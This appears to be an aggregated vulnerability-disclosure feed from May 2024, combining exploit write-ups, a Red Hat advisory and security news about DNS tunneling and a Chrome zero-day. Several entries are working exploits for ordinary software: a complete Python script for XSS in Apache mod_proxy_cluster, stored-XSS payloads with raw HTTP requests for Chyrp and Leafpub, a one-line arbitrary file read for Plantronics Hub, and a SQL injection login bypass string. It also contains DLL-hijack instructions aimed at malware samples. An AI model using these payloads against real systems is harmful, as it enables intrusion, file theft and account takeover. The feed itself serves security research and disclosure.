TrojanSpy.Win64.EMOTET.A malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/f917c77f60c3c1ac6dbbadbf366ddd30.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: TrojanSpy.Win64.EMOTET.A Vulnerability: Arbitrary Code ExecutionDescription: The malware looks for and executes a x64-bit "CRYPTBASE.dll" PE file in its current directory. Therefore, we can hijack the DLL and execute our own code to intercept and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Leverage RansomLord v3 for DLL generation, while written as a proof-of-concept to specifically defeat ransomware, it can also be used to generate DLLs to try an exploit other types of malwares. All basic tests were conducted successfully in a virtual machine environment.Family: EMOTETType: PE64MD5: f917c77f60c3c1ac6dbbadbf366ddd30SHA256: b76fbc81bbb7f3108d27d9da9e2646aeb3769fba62bf7961f79306812de3486cVuln ID: MVID-2024-0684Disclosure: 05/14/2024Exploit/PoC:1) Download RansomLord v3    https://github.com/malvuln/RansomLord2) Locate the x64 CRYPTBASE.dll entry using the -m flag (DLL Map)3) Use -g flag (Generate Exploit) to output an x64 DLL CRYPTBASE.dll, based on an existing vulnerable malware in the victims list.4) (Optional) -e flag to setup Windows event IOC logging in the registry, this will log the SHA256 hash, full path and filename.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

TrojanSpy.Win64.EMOTET.A MVID-2024-0684 Code Execution

Plantronics Hub version 3.25.1 suffers from an arbitrary file read vulnerability.

    # Exploit Title: Plantronics Hub 3.25.1 – Arbitrary File Read# Date: 2024-05-10# Exploit Author: Farid Zerrouk from Deloitte Belgium, Alaa Kachouh fromMastercard# Vendor Homepage:https://support.hp.com/us-en/document/ish_9869257-9869285-16/hpsbpy03895# Version: Plantronics Hub for Windows version 3.25.1# Tested on: Windows 10/11# CVE : CVE-2024-27460As a regular user drop a file called "MajorUpgrade.config" inside the"C:\ProgramData\Plantronics\Spokes3G" directory. The content ofMajorUpgrade.config should look like the following one liner:^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.configExchange <FULL-PATH-TO-YOUR-DESIRED-FILE> with a desired file to read/copy(any file on the system). The desired file will be copied into C:\ProgramFiles (x86)\Plantronics\Spokes3G\UpdateServiceTempSteps to reproduce (POC):- Open cmd.exe- Navigate using cd C:\ProgramData\Plantronics\Spokes3G- echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config- Desired file will be copied into C:\Program Files(x86)\Plantronics\Spokes3G\UpdateServiceTemp

Plantronics Hub 3.25.1 Arbitrary File Read

Backdoor.Win32.AsyncRat malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/2337b9a12ecf50b94fc95e6ac34b3ecc.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.AsyncRatVulnerability: Arbitrary Code ExecutionDescription: The malware looks for and executes a x32-bit "CRYPTSP.dll" PE file in its current directory. Therefore, we can hijack the DLL and execute our own code to intercept and terminate the malware. Once loaded the exploit dll will check if the current directory is "C:\Windows\System32", if not we grab our process ID and terminate. Leverage RansomLord v3 for DLL generation, while written as a proof-of-concept to specifically defeat ransomware, it can also be used to generate DLLs to try an exploit other types of malwares. All basic tests were conducted successfully in a virtual machine environment.Family: AsyncRatType: PE32MD5: 2337b9a12ecf50b94fc95e6ac34b3eccSHA256: 3c703ecb3e8c54e352ff39fadbe789bb2313f848bd69551b07bf2ed0a58744b9Vuln ID: MVID-2024-0683Disclosure: 05/14/2024Exploit/PoC:1) Download RansomLord v3    https://github.com/malvuln/RansomLord2) Locate the x32 CRYPTSP.dll entry using the -m flag (DLL Map)3) Use -g flag (Generate Exploit) to output an x32 DLL CRYPTSP.dll, based on an existing vulnerable malware in the victims list.4) (Optional) -e flag to setup Windows event IOC logging in the registry, this will log the SHA256 hash, full path and filename.Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.AsyncRat MVID-2024-0683 Code Execution

Apache mod_proxy_cluster suffers from a cross site scripting vulnerability.

    import requestsimport argparsefrom bs4 import BeautifulSoupfrom urllib.parse import urlparse, parse_qs, urlencode, urlunparsefrom requests.exceptions import RequestExceptionclass Colors:    RED = '\033[91m'    GREEN = '\033[1;49;92m'    RESET = '\033[0m'def get_cluster_manager_url(base_url, path):    print(Colors.GREEN + f"Preparing the groundwork for the exploitation on {base_url}..." + Colors.RESET)    try:        response = requests.get(base_url + path)        response.raise_for_status()    except requests.exceptions.RequestException as e:        print(Colors.RED + f"Error: {e}" + Colors.RESET)        return None    print(Colors.GREEN + f"Starting exploit check on {base_url}..." + Colors.RESET)    if response.status_code == 200:        print(Colors.GREEN + f"Check executed successfully on {base_url}..." + Colors.RESET)        # Use BeautifulSoup to parse the HTML content        soup = BeautifulSoup(response.text, 'html.parser')        # Find all 'a' tags with 'href' attribute        all_links = soup.find_all('a', href=True)        # Search for the link containing the Alias parameter in the href attribute        cluster_manager_url = None        for link in all_links:            parsed_url = urlparse(link['href'])            query_params = parse_qs(parsed_url.query)            alias_value = query_params.get('Alias', [None])[0]            if alias_value:                print(Colors.GREEN + f"Alias value found" + Colors.RESET)                cluster_manager_url = link['href']                break        if cluster_manager_url:            print(Colors.GREEN + f"Preparing the injection on {base_url}..." + Colors.RESET)            return cluster_manager_url        else:            print(Colors.RED + f"Error: Alias value not found on {base_url}..." + Colors.RESET)            return None    print(Colors.RED + f"Error: Unable to get the initial step on {base_url}")    return Nonedef update_alias_value(url):    parsed_url = urlparse(url)    query_params = parse_qs(parsed_url.query, keep_blank_values=True)    query_params['Alias'] = ["<DedSec-47>"]    updated_url = urlunparse(parsed_url._replace(query=urlencode(query_params, doseq=True)))    print(Colors.GREEN + f"Injection executed successfully on {updated_url}" + Colors.RESET)    return updated_urldef check_response_for_value(url, check_value):    response = requests.get(url)    if check_value in response.text:        print(Colors.RED + "Website is vulnerable POC by :")        print(Colors.GREEN + """          ____           _ ____                  _  _ _____          |  _ \  ___  __| / ___|  ___  ___      | || |___  |         | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || |  / /          | |_| |  __/ (_| |___) |  __/ (_  |____|__  | / /           |____/ \___|\__,_|____/ \___|\___|        |_|/_/                                        github.com/DedSec-47    """)    else:        print(Colors.GREEN + "Website is not vulnerable POC by :")        print(Colors.GREEN + """          ____           _ ____                  _  _ _____          |  _ \  ___  __| / ___|  ___  ___      | || |___  |         | | | |/ _ \/ _` \___ \ / _ \/ __| ____| || |  / /          | |_| |  __/ (_| |___) |  __/ (_  |____|__  | / /           |____/ \___|\__,_|____/ \___|\___|        |_|/_/                                        github.com/DedSec-47    """)def main():    # Create a command-line argument parser    parser = argparse.ArgumentParser(description="python CVE-2023-6710.py -t https://example.com -u /cluster-manager")    # Add a command-line argument for the target (-t/--target)    parser.add_argument('-t', '--target', help='Target domain (e.g., https://example.com)', required=True)    # Add a command-line argument for the URL path (-u/--url)    parser.add_argument('-u', '--url', help='URL path (e.g., /cluster-manager)', required=True)    # Parse the command-line arguments    args = parser.parse_args()    # Get the cluster manager URL from the specified website    cluster_manager_url = get_cluster_manager_url(args.target, args.url)    # Check if the cluster manager URL is found    if cluster_manager_url:        # Modify the URL by adding the cluster manager value        modified_url = args.target + cluster_manager_url        modified_url = update_alias_value(args.target + cluster_manager_url)        print(Colors.GREEN + "Check executed successfully" + Colors.RESET)        # Check the response for the value "<DedSec-47>"        check_response_for_value(modified_url, "<DedSec-47>")if __name__ == "__main__":    main()

Apache mod_proxy_cluster Cross Site Scripting

Red Hat Security Advisory 2024-2833-03 - An update to the images for Red Hat Integration - Service Registry is now available from the Red Hat Container Catalog. The purpose of this text-only errata is to inform you about the security issues fixed in this release. Issues addressed include denial of service and memory leak vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_2833.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Service Registry (container images) release and security update [2.5.11 GA]  
Advisory ID:        RHSA-2024:2833-03  
Product:            Red Hat Integration  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:2833  
Issue date:         2024-05-14  
Revision:           03  
CVE Names:          CVE-2024-1023  
====================================================================

Summary: 

An update to the images for Red Hat Integration - Service Registry is now available from the Red Hat Container Catalog. The purpose of this text-only errata is to inform you about the security issues fixed in this release.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

This release of Red Hat Integration - Service Registry 2.5.11 GA includes the following security fixes.

Security Fix(es):

* commons-compress: Denial of service caused by an infinite loop for a corrupted DUMP file [rhint-serv-2] (CVE-2024-25710)

* vert.x: io.vertx/vertx-core: memory leak due to the use of Netty FastThreadLocal data structures in Vertx [rhint-serv-2] (CVE-2024-1023)

* vertx-core: io.vertx:vertx-core: memory leak when a TCP server is configured with TLS and SNI support [rhint-serv-2] (CVE-2024-1300)

* commons-compress: OutOfMemoryError unpacking broken Pack200 file [rhint-serv-2] (CVE-2024-26308)

* netty-codec-http: Allocation of Resources Without Limits or Throttling [rhint-serv-2] (CVE-2024-29025)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1023

References:

https://access.redhat.com/documentation/en-us/red_hat_build_of_apicurio_registry/2.5  
https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2260840  
https://bugzilla.redhat.com/show_bug.cgi?id=2263139  
https://bugzilla.redhat.com/show_bug.cgi?id=2264988  
https://bugzilla.redhat.com/show_bug.cgi?id=2264989  
https://bugzilla.redhat.com/show_bug.cgi?id=2272907

Red Hat Security Advisory 2024-2833-03

Chryp version 2.5.2 suffers from a persistent cross site scripting vulnerability.

    # Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)# Date: 2024-04-24# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://github.com/chyrp/# Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip# Version: 2.5.2# Tested on: MacOS### Steps to Reproduce ###- Login from the address: http://localhost/chyrp/?action=login.- Click on 'Write'.- Type this payload into the 'Title' field: "><img src=x onerror=alert("Stored")>- Fill in the 'Body' area and click 'Publish'.- An alert message saying "Stored" will appear in front of you.### PoC Request ###POST /chyrp/admin/?action=add_post HTTP/1.1Host: localhostCookie: ChyrpSession=c4194c16a28dec03e449171087981d11;show_more_options=trueUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)Gecko/20100101 Firefox/124.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data;boundary=---------------------------28307567523233313132815561598Content-Length: 1194Origin: http://localhostReferer: http://localhost/chyrp/admin/?action=write_postUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="title""><img src=x onerror=alert("Stored")>-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="body"<p>1337</p>-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="status"public-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="slug"-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="created_at"04/24/24 12:31:57-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="original_time"04/24/24 12:31:57-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="trackbacks"-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="feather"text-----------------------------28307567523233313132815561598Content-Disposition: form-data; name="hash"11e11aba15114f918ec1c2e6b8f8ddcf-----------------------------28307567523233313132815561598--

Chyrp 2.5.2 Cross Site Scripting

Leafpub version 1.1.9 suffers from a persistent cross site scripting vulnerability.

    # Leafpub 1.1.9 - Stored Cross-Site Scripting (XSS)# Date: 2024-04-24# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://github.com/Leafpub# Software Link: https://github.com/Leafpub/leafpub# Version: 1.1.9# Tested on: MacOS### Steps to Reproduce ###- Please login from this address: http://localhost/leafpub/admin/login- Click on the Settings > Advanced- Enter the following payload into the "Custom Code" area and save it: ("><imgsrc=x onerror=alert("Stored")>)- An alert message saying "Stored" will appear in front of you.### PoC Request ###POST /leafpub/api/settings HTTP/1.1Host: localhostCookie:authToken=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3MTM5NjQ2MTcsImV4cCI6MTcxMzk2ODIxNywiZGF0YSI6eyJ1c2VybmFtZSI6ImFkbWluIn19.967N5NYdUKxv1sOXO_OTFiiLlm7sfgDWPXKX7iEZwloUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)Gecko/20100101 Firefox/124.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 476Origin: http://localhostReferer: http://localhost/leafpub/admin/settingsSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closetitle=A+Leafpub+Blog&tagline=Go+forth+and+create!&homepage=&twitter=&theme=range&posts-per-page=10&cover=source%2Fassets%2Fimg%2Fleaves.jpg&logo=source%2Fassets%2Fimg%2Flogo-color.png&favicon=source%2Fassets%2Fimg%2Flogo-color.png&language=en-us&timezone=America%2FNew_York&default-title=Untitled+Post&default-content=Start+writing+here...&head-code=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22Stored%22)%3E&foot-code=&generator=on&mailer=default&maintenance-message=&hbs-cache=on

Leafpub 1.1.9 Cross Site Scripting

Prison Management System Using PHP suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit : Prison Management System Using PHP -SQL Injection Authentication Bypass# Date: 15/03/2024# Exploit Author: Sanjay Singh# Vendor Homepage: https://www.sourcecodester.com# Software Link:https://www.sourcecodester.com/sql/17287/prison-management-system.html# Tested on: Windows ,XAMPP# CVE : CVE-2024-33288# Proof of Concept:Step 1-Visit http://localhost/prison/Step 2 - Click on Admin Dashboard button and redirect on login page.Step 3– Enter username as admin' or '1'='1 and password as 123456Step 4 – Click sing In and now you will be logged in as admin.

Prison Management System Using PHP SQL Injection

By Deeba Ahmed
Hackers are hiding malicious messages in everyday internet traffic! Learn how DNS tunneling works and how to protect yourself from this sneaky cyberattack. Stop hackers from scanning your network and tracking your clicks.
This is a post from HackRead.com Read the original post: DNS Tunneling Used for Stealthy Scans and Email Tracking

DNS tunneling is used to bypass security filters by hiding malicious traffic in DNS packets, allowing hackers to steal stolen data or hide inbound malware or command-and-control instructions.

However, Palo Alto Networks’ Unit 42 has discovered that threat actors are using DNS tunneling in innovative ways other than C2 and VPN, including scanning for network vulnerabilities and assessing the success of phishing campaigns.

****DNS Tunneling for Tracking****

Reportedly, attackers are abusing DNS tunneling to track victims’ activities related to spam, phishing, or advertisement contents, and delivering malicious domains with victims’ identity information encoded in subdomains. 

For instance, in phishing attacks, DNS tunneling helps attackers embed tracking information within DNS requests, allowing them to monitor user interactions with content hosted on Content Delivery Networks (CDNs) and see if their emails are being delivered.

This was observed in the TrkCdn campaign, which targeted 731 potential victims using 75 IP addresses for nameservers, and in the SpamTracker campaign which targeted Japanese educational institutions using 44 tunneling domains with IP addresses 35.75.233210. Both campaigns used the same DGA naming and subdomain encoding method.

Overview of data exfiltration and infiltration with DNS tunneling (Screenshot: Unit42)

Attackers utilized DNS logs to track victims’ emails and monitor campaign performance. They registered new domains between October 2020 and January 2024, 2 to 12 weeks before distribution and monitored their behaviour for nine to 11 months and retired them after a year.

****DNS Tunneling for Scanning****

Adversaries can use DNS tunnelling to scan network infrastructure by encoding IP addresses and timestamps in tunneling payloads with spoofed source IP addresses, to discover open resolvers, exploit resolver vulnerabilities, and perform DNS attacks, potentially leading to malicious redirection or denial of service (**DoS**). 

This method was observed in a campaign called “SecShow,” where attackers periodically scan a victim’s network infrastructure and perform reflection attacks.

“This campaign generally targets open resolvers. As a result, we find victims mainly come from education, high tech, and government fields, where open resolvers are commonly found,” Unit 42 researchers **wrote**.

Furthermore, attackers can use the same technique to track multiple victims and are exploiting DNS queries to detect network misconfigurations in targeted organizations, potentially exploiting them for DoS attacks, data theft, or malware installation.

To protect yourself, invest in security software that detects unusual DNS traffic patterns, and regularly update your operating system and applications to patch vulnerabilities. Always be wary of clicking on suspicious links in emails or messages.

1.  Dangers of DNS poisoning and how to prevent it
2.  DNSpionage group’s Karkoff malware selectively pick victims
3.  Roaming Mantis Malware Returns with DNS Changer Capability
4.  Check your VPN DNS test tool legitimacy: Is it “legit” or deceptive
5.  Cybersecurity Firm Hacks Itself, Finds DNS Flaw Leak AWS Credentials

DNS Tunneling Used for Stealthy Scans and Email Tracking

Google on Monday shipped emergency fixes to address a new zero-day flaw in the Chrome web browser that has come under active exploitation in the wild.
The high-severity vulnerability, tracked as CVE-2024-4761, is an out-of-bounds write bug impacting the V8 JavaScript and WebAssembly engine. It was reported anonymously on May 9, 2024.
Out-of-bounds write bugs could be typically

Tag

#vulnerability